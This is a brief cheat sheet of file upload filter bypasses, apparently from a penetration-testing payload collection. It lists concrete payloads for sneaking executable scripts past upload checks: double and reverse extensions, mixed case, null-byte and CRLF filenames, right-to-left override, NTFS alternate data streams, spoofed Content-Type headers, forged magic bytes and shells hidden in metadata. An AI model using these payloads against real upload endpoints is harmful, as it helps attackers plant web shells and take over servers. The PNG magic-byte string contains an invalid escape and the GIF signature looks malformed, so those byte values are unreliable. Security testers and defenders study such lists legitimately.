File Upload Tricks

Upload tricks

  • Use double extensions : .jpg.php, .png.php5

  • Use reverse double extension (useful to exploit Apache misconfigurations where anything with extension .php, but not necessarily ending in .php will execute code): .php.jpg

  • Random uppercase and lowercase : .pHp, .pHP5, .PhAr

  • Null byte (works well against pathinfo())

    • .php%00.gif

    • .php\x00.gif

    • .php%00.png

    • .php\x00.png

    • .php%00.jpg

    • .php\x00.jpg

  • Special characters

    • Multiple dots : file.php...... , in Windows when a file is created with dots at the end those will be removed.

    • Whitespace and new line characters

      • file.php%20

      • file.php%0d%0a.jpg

      • file.php%0a

    • Right to Left Override (RTLO): name.%E2%80%AEphp.jpg will became name.gpj.php.

    • Slash: file.php/, file.php.\, file.j\sp, file.j/sp

    • Multiple special characters: file.jsp/././././.

  • Mime type, change Content-Type : application/x-php or Content-Type : application/octet-stream to Content-Type : image/gif

    • Content-Type : image/gif

    • Content-Type : image/png

    • Content-Type : image/jpeg

    • Content-Type wordlist: SecLists/content-type.txt

    • Set the Content-Type twice: once for unallowed type and once for allowed.

  • Magic Bytes

    • Sometimes applications identify file types based on their first signature bytes. Adding/replacing them in a file might trick the application.

      • PNG: \x89PNG\r\n\x1a\n\0\0\0\rIHDR\0\0\x03H\0\xs0\x03[

      • JPG: \xff\xd8\xff

      • GIF: GIF87a OR GIF8;

    • Shell can also be added in the metadata

  • Using NTFS alternate data stream (ADS) in Windows. In this case, a colon character ":" will be inserted after a forbidden extension and before a permitted one. As a result, an empty file with the forbidden extension will be created on the server (e.g. "file.asax:.jpg"). This file might be edited later using other techniques such as using its short filename. The "::$data" pattern can also be used to create non-empty files. Therefore, adding a dot character after this pattern might also be useful to bypass further restrictions (.e.g. "file.asp::$data.")

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